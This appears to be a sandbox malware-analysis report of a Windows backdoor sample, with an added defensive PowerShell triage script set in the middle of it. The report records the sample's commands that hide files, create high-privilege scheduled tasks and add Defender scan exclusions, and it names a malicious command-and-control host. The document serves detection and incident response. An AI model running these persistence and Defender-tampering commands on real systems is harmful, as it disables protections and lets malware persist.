                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara match  File source: RLesaPFXew.exe, type: SAMPLE
                  Source: Yara match  File source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match  File source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match  File source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
                  Source: Yara match  File source: C:\Users\user\java\$77java.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Memory allocated: A00000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Memory allocated: 1B620000 memory reserve | memory write watch
                  Source: C:\Users\user\java\$77java.exe  Memory allocated: FA0000 memory reserve | memory write watch
                  Source: C:\Users\user\java\$77java.exe  Memory allocated: 1B650000 memory reserve | memory write watch
                  Source: C:\Users\user\java\$77java.exe  Memory allocated: 2700000 memory reserve | memory write watch
                  Source: C:\Users\user\java\$77java.exe  Memory allocated: 1B040000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\java\$77java.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7002
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2747
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe TID: 1864  Thread sleep count: 71 > 30
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe TID: 6536  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088  Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\java\$77java.exe TID: 5716  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed  (5 identical entries)
                  Source: C:\Users\user\java\$77java.exe  File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\java\$77java.exe  File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\java\$77java.exe  Thread delayed: delay time: 922337203685477
                  Source: $77java.exe, 0000000D.00000002.3391902059.000000001C308000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%/
                  Source: RLesaPFXew.exe, 00000000.00000002.2158070859.000000000309F000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Process token adjusted: Debug
                  Source: C:\Users\user\java\$77java.exe  Process token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                  Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\timeout.exe timeout 3
                  Source: C:\Windows\System32\cmd.exe  Process created: C:\Users\user\java\$77java.exe "C:\Users\user\java\$77java.exe"
                  Source: C:\Users\user\java\$77java.exe  Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Users\user\java\$77java.exe  Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                  Source: C:\Users\user\java\$77java.exe  Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Users\user\java\$77java.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                  Source: C:\Users\user\java\$77java.exe  Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
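                  The process-creation entries above record the sample's persistence and defense-evasion chain: the dropper hides C:\Users\user\java and $77java.exe with attrib +s +h, relaunches the payload through a temporary batch file after a 3-second timeout, and the payload then registers a scheduled task named "$77java.exe" with /RL HIGHEST, adds exe, bat, dll and ps1 to Defender's extension exclusions via Set-MpPreference, and registers a second daily task "java_Task-DAILY-21PM". Two caveats for triage: the daily task's action is recorded as the literal, unexpanded string %MyFile%, so that task may be inert on the victim but is still a clean indicator; and the $77 name prefix is the file- and process-hiding convention of the open-source r77 rootkit (a fact not stated in this report), so if such a hook were active, user-mode enumeration could be blinded and findings should be corroborated from an offline image or EDR telemetry. The following PowerShell is an added host triage check, not code from the report, from Joe Sandbox, or from the sample; it assumes Windows 10/11 with Microsoft Defender, an elevated prompt (recent builds hide exclusions from non-admin callers of Get-MpPreference), and that the batch dropper references $77java.exe, which is inferred from the cmd.exe -> timeout -> $77java.exe chain rather than shown in the report.

```powershell
# Added host triage check (example code, not from the Joe Sandbox report or the sample).
# It looks for the persistence and Defender-tampering artifacts the report records:
#   - %USERPROFILE%\java\$77java.exe, hidden with attrib +s +h
#   - scheduled tasks "$77java.exe" (/RL HIGHEST) and "java_Task-DAILY-21PM"
#   - Defender ExclusionExtension containing exe, bat, dll, ps1
#   - a dropper batch %TEMP%\tmp*.tmp.bat that launches $77java.exe (inferred from the
#     cmd.exe -> timeout 3 -> $77java.exe chain; the .bat body is not shown in the report)
# Assumptions: Windows 10/11 with Microsoft Defender, run from an elevated PowerShell.

$ErrorActionPreference = 'SilentlyContinue'
$findings = New-Object 'System.Collections.Generic.List[string]'

# 1. Dropped payload in every local profile. -Force is required because the file
#    and its directory carry the Hidden and System attributes set by attrib.exe.
foreach ($profileDir in Get-ChildItem -LiteralPath 'C:\Users' -Directory) {
    $exe = Join-Path $profileDir.FullName 'java\$77java.exe'
    $item = Get-Item -LiteralPath $exe -Force
    if ($item) {
        $hash = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        $findings.Add("dropped file: $exe attributes=$($item.Attributes) sha256=$hash")
    }
}

# 2. Scheduled tasks created by the payload. The principal's RunLevel shows whether
#    the task runs with the highest available token (the /RL HIGHEST flag above).
foreach ($taskName in @('$77java.exe', 'java_Task-DAILY-21PM')) {
    $task = Get-ScheduledTask -TaskName $taskName
    if ($task) {
        $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        $findings.Add("scheduled task: '$taskName' state=$($task.State) runlevel=$($task.Principal.RunLevel) actions=[$actions]")
    }
}

# 3. Defender exclusions. The payload ran Set-MpPreference -ExclusionExtension exe,bat,dll,ps1,
#    which is an exclusion by file extension, so any later payload with one of those
#    extensions is not scanned.
$suspectExt = @('exe', 'bat', 'dll', 'ps1')
$pref = Get-MpPreference
$excluded = @($pref.ExclusionExtension | ForEach-Object { $_.TrimStart('.').ToLowerInvariant() })
$hits = @($excluded | Where-Object { $suspectExt -contains $_ })
if ($hits.Count -gt 0) {
    $findings.Add("Defender ExclusionExtension contains: $($hits -join ', ')")
}

# 4. Dropper batch file(s) left in %TEMP% that reference the payload name.
foreach ($bat in Get-ChildItem -Path (Join-Path $env:TEMP 'tmp*.tmp.bat') -File) {
    if (Select-String -LiteralPath $bat.FullName -Pattern '\$77java\.exe' -Quiet) {
        $findings.Add("dropper batch: $($bat.FullName)")
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No SilverRat persistence artifacts from the report were found on this host.'
} else {
    $findings | ForEach-Object { Write-Output "[FINDING] $_" }
}
```

                  If the check reports hits, Remove-MpPreference -ExclusionExtension exe,bat,dll,ps1 and Unregister-ScheduledTask -TaskName '$77java.exe' -Confirm:$false undo the two tampering steps, but only after the payload's process tree has been stopped: the report shows $77java.exe querying for its task before creating it, so a still-running instance should be expected to recreate it.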
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe  Queries volume information: C:\Users\user\Desktop\RLesaPFXew.exe VolumeInformation
                  Source: C:\Windows\System32\cmd.exe  Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\java\$77java.exe  Queries volume information: C:\Users\user\java\$77java.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation  (3 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation  (3 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\java\$77java.exeQueries volume information: C:\Users\user\java\$77java.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match, File source: RLesaPFXew.exe, type: SAMPLE
Source: Yara match, File source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\java\$77java.exe, type: DROPPED
ATT&CK matrix, listed by tactic column (bracketed numbers are the counts shown next to a technique in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Exploitation for Client Execution [1]; Command and Scripting Interpreter [1]; Scheduled Task/Job [21]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scripting [1]; DLL Side-Loading [1]; Scheduled Task/Job [21]; Registry Run Keys / Startup Folder [11]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading [1]; Process Injection [11]; Scheduled Task/Job [21]; Registry Run Keys / Startup Folder [11]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [11]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [31]; Process Injection [11]
Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery [1]; System Information Discovery [13]; Query Registry [1]; Security Software Discovery [11]; Process Discovery [1]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [11]; Input Capture [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1552938, Sample: RLesaPFXew.exe, Start date: 09/11/2024, Architecture: WINDOWS, Score: 100
Contacted hosts: 23.ip.gl.ply.gg, discordapp.com
Sample-level signatures: Found malware configuration; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 9 other signatures

Process tree (node numbers are those of the behavior graph):
RLesaPFXew.exe (node 10)
    dropped: C:\Users\user\java\$77java.exe (PE32+); C:\Users\user\AppData\...\RLesaPFXew.exe.log (CSV)
    signatures: Creates autostart registry keys to launch java; Uses cmd line tools excessively to alter registry or file data
    -> cmd.exe (node 16)
        -> $77java.exe (node 22)
            network: 23.ip.gl.ply.gg 147.185.221.23, ports 49711, 49744, 49796 (SALSGIVERUS, United States); discordapp.com 162.159.133.233, ports 443, 49710 (CLOUDFLARENETUS, United States)
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
            -> powershell.exe (node 34): Loading BitLocker PowerShell Module
                -> conhost.exe (node 43)
                -> WmiPrvSE.exe (node 45)
            -> schtasks.exe (node 37) -> conhost.exe (node 47)
            -> schtasks.exe (node 39) -> conhost.exe (node 49)
            -> 2 other processes (node 41) -> conhost.exe (node 51), conhost.exe (node 53)
        -> conhost.exe (node 26)
        -> timeout.exe (node 28)
    -> attrib.exe (node 18) -> conhost.exe (node 30)
    -> attrib.exe (node 20) -> conhost.exe (node 32)
$77java.exe (node 14), started directly from the start node

Source | Detection | Scanner | Label
RLesaPFXew.exe | 66% | ReversingLabs | ByteCode-MSIL.Backdoor.Crysan
RLesaPFXew.exe | 100% | Avira | HEUR/AGEN.1313050
RLesaPFXew.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\java\$77java.exe | 100% | Avira | HEUR/AGEN.1313050
C:\Users\user\java\$77java.exe | 100% | Joe Sandbox ML |
C:\Users\user\java\$77java.exe | 66% | ReversingLabs | ByteCode-MSIL.Backdoor.Crysan

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
23.ip.gl.ply.gg | 100% | Avira URL Cloud | malware
http://microsoft.co4yL | 0% | Avira URL Cloud | safe
https://g.top4top.io/p_2522c7w8u1.png | 0% | Avira URL Cloud | safe
https://g.top4top.io/p_2522c7w8u | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
23.ip.gl.ply.gg | 147.185.221.23 | true | true | | unknown
discordapp.com | 162.159.133.233 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
23.ip.gl.ply.gg | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://discordapp.com | $77java.exe, 0000000D.00000002.3389411382.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.top4top.io/p_2522c7w8u | $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://g.top4top.io/p_2522c7w8u1.png | $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.microsoft | $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RLesaPFXew.exe, 00000000.00000002.2158375099.0000000003621000.00000004.00000800.00020000.00000000.sdmp, $77java.exe, 0000000D.00000002.3389411382.0000000003689000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://discordapp.com | $77java.exe, 0000000D.00000002.3389411382.00000000039CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://microsoft.co4yL | $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.23 | 23.ip.gl.ply.gg | United States | 12087 | SALSGIVERUS | true
162.159.133.233 | discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1552938
Start date and time: 2024-11-09 22:52:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RLesaPFXew.exe (renamed because the original name is a hash value)
Original Sample Name: aa80b2971f14c91c4a09162357188bf73d0f9934.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@32/10@2/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 14
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target $77java.exe, PID 3000 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: RLesaPFXew.exe
Time | Type | Description
16:53:07 | API Interceptor | 1x Sleep call for process: RLesaPFXew.exe modified
16:53:12 | API Interceptor | 16x Sleep call for process: powershell.exe modified
22:53:11 | Task Scheduler | Run new task: $77java.exe path: C:\Users\user\java\$77java.exe s>"\$77java.exe" /AsAdmin
22:53:11 | Task Scheduler | Run new task: java_Task-DAILY-21PM path: %MyFile%
                                                    Process:C:\Users\user\java\$77java.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):859
                                                    Entropy (8bit):5.379735105545312
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                    MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                    SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                    SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                    SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                    Malicious:false
